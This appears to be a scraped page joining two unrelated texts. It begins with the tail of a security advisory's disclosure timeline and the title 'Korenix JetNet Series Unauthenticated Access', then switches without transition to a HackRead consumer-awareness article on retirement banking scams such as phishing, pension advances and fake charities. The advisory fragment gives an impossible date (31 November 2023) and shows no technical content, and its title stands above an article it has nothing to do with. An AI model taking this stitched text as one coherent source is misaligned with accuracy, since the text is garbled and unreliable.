Meeting with contact stating that it effects the whole series.31-11-2023: Meeting to discuss potential solutions.11-12-2023: Release delayed due to lack of workaround from manufacturer.21-12-2023: Manufacturer provides workaround. Release date confirmed.09-01-2024: Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF Sebastian Dietz / @2024

Korenix JetNet Series Unauthenticated Access

By Uzair Amir
In the labyrinth of financial scams, one of the most insidious is the retirement banking scam. Imagine a…
This is a post from HackRead.com Read the original post: Unravelling Retirement Banking Scams and How To Protect Yourself

In the labyrinth of financial scams, one of the most insidious is the retirement banking scam. Imagine a lifetime of diligence and effort, only to be robbed in your golden years. According to the FBI, in 2020 alone, financial scams targeting seniors netted more than $1 billion. This grim reality affects countless unsuspecting retirees, demonstrating the urgency to learn how to protect ourselves.

It’s a quiet crisis that we need to address, and understanding these scams is the first step toward safeguarding our financial future. Let’s begin this journey to empowerment, where knowledge is our most potent defence.

****Anatomy of Retirement Banking Scams**  **

Retirement crypto and banking scams are not random acts but carefully crafted strategies that exploit vulnerabilities. Typically, these scams involve manipulating trust, inciting fear, or promising high investment returns. As we delve deeper, we’ll explore the common tactics scammers utilize, the red flags to watch out for, and the preventive measures you can take.

****What are retirement banking scams?****

Retirement banking scams refer to fraudulent acts that aim to deceive retirees, leading to the loss of their hard-earned savings. Scammers prey on retirees, exploiting their lack of familiarity with the intricate financial landscape or utilizing their trust in seemingly legitimate institutions.

These scams may materialize in various forms, such as bogus investment opportunities, fake lottery winnings, or even imposter relatives in need.

Awareness and vigilance are critical to debunk these deceptions. As we proceed, let’s examine the most common types of these scams, spot their tell-tale signs, and delve into practical preventive measures.

****Common techniques used by scammers****

Here are some common techniques scammers may use against you:

****Phishing: The digital predator****

Phishing is a common scamming technique prevalent in the digital sphere. It’s characterized by deceptive emails or text messages sent by scammers masquerading as trustworthy entities.

The primary purpose is to trick unsuspecting victims into disclosing sensitive information like passwords, credit card numbers, or Social Security numbers. These messages often contain seemingly urgent requests or threats, compelling the recipient to act immediately.

It’s essential to stay vigilant against such attempts by not clicking on suspicious links or sharing personal information via unsecured platforms.

****The Pension Advance Scam****

The pension advance scam is a deceptive scheme where retirees are offered an immediate cash advance in exchange for future pension payments.

This proposal may seem attractive to those in financial need but often includes exorbitant interest rates and fees.

Consequently, retirees pay significantly more than the initial advance, depleting their retirement funds prematurely. Awareness and caution are vital when dealing with offers that seem too good to be true.

****Bogus investment opportunities****

Bogus investment opportunities represent fraudulent schemes designed to dupe people into separating them from their hard-earned money. Scammers craft convincing narratives around high-return, low-risk investment opportunities. They use persuasive language and seemingly credible documentation to appear legitimate.

However, these investments are non-existent or grossly misrepresented, leaving the investors with significant financial losses once the scam is revealed. The best defence is scepticism and due diligence before investing.

****Fake charity scams targeting retirees****

Fake charity scams targeting retirees exploit the kind-heartedness of senior citizens. Scammers pose as charity workers, requesting donations for fabricated causes. They employ emotional narratives to elicit sympathy and manipulate their targets into giving money. Often, these scams occur during disaster relief scenarios, where the urgency and desire to help are high. The best protection is thorough research before donating to any charity.

****How to protect yourself from these scams****

Protecting oneself from scams requires vigilance and proactive measures. Here are straightforward and effective ways you can protect yourself:

*   **Firstly**, always verify the legitimacy of financial offers and investment opportunities through credible sources when you want to open a retirement account. Be wary of promises that sound too good to be true.
*   **Secondly**, consult a trusted financial advisor or family member before committing to any financial agreement.
*   **Thirdly**, adopt scepticism towards unsolicited charitable requests. Research the charity thoroughly before donating.
*   **Fourthly**, a cyber insurance policy can protect you from cyber threats and scams. This policy covers financial losses from cyber fraud, identity theft, and other online crimes.
*   **Lastly**, stay informed about current scams and fraud tactics through reliable sources such as government websites or trusted news outlets.

****Identifying Vulnerable Targets****

Scammers incessantly devise cunning strategies to exploit the vulnerability of others, particularly retirees. Understanding their tactics is paramount for self-protection.

The following sections delve into how scammers identify their targets, the psychological ploys they use, and practical strategies to safeguard themselves. Stay vigilant, stay informed, and maintain a healthy level of scepticism.

****Who falls prey to retirement banking scams?****

Typically, retirement banking scams ensnare individuals who are less tech-savvy or unfamiliar with the tactics used by fraudsters. Often, these are retirees who have accumulated substantial savings over their lifetime. They might be more trusting, isolated, or lack the knowledge of modern digital safety measures. Scammers exploit these vulnerabilities, crafting clever ruses to deceive them.

****Psychological tactics used on retirees****

Scammers employ specific psychological tactics to connive retirees. They wield fear, intimidation, and urgency to pressure their victims into impulsive decisions. They may impersonate authority figures, instilling a sense of obligation in the retiree.

Alternatively, they may feign distress, appealing to the retiree’s empathy. Flattery or promises of high returns can also lure unsuspecting individuals into their snare, making them easy prey for fraudulent schemes.

****The role of technology in targeting seniors****

Technology plays a crucial role in scams targeting seniors. Scammers leverage digital platforms like email, social media, and online banking to reach their victims. These platforms allow for anonymity, making it easier to impersonate trusted entities. Additionally, advanced technologies enable scammers to execute sophisticated schemes, seizing substantial sums from unsuspecting retirees who may lack digital literacy skills.

****Empowering Your Golden Years: Concluding Strategies to Outsmart Scammers****

The fight against scams starts with awareness and education. Knowledge is the best defence. Understanding how these scams operate and identifying their red flags allows you to avoid falling into these well-laid traps.

In conclusion, vigilance and awareness are vital in protecting your financial well-being. A moment’s precaution can save you the heartache of financial loss. Safeguard your golden years—they are the reward for a lifetime of perseverance and hard work.

1.  **Hackers used fake job website to scam jobless US veterans**
2.  **US military personnel defrauded into losing $822m via scams**
3.  **Chinese Scammers Use Fake Loan Apps for Money Laundering**
4.  **New Phishing Scam Targets Digital Payment and Online Banking Users**
5.  **“Wire bank transfer” malware phishing scam hits SWIFT banking system**

Tag

#mac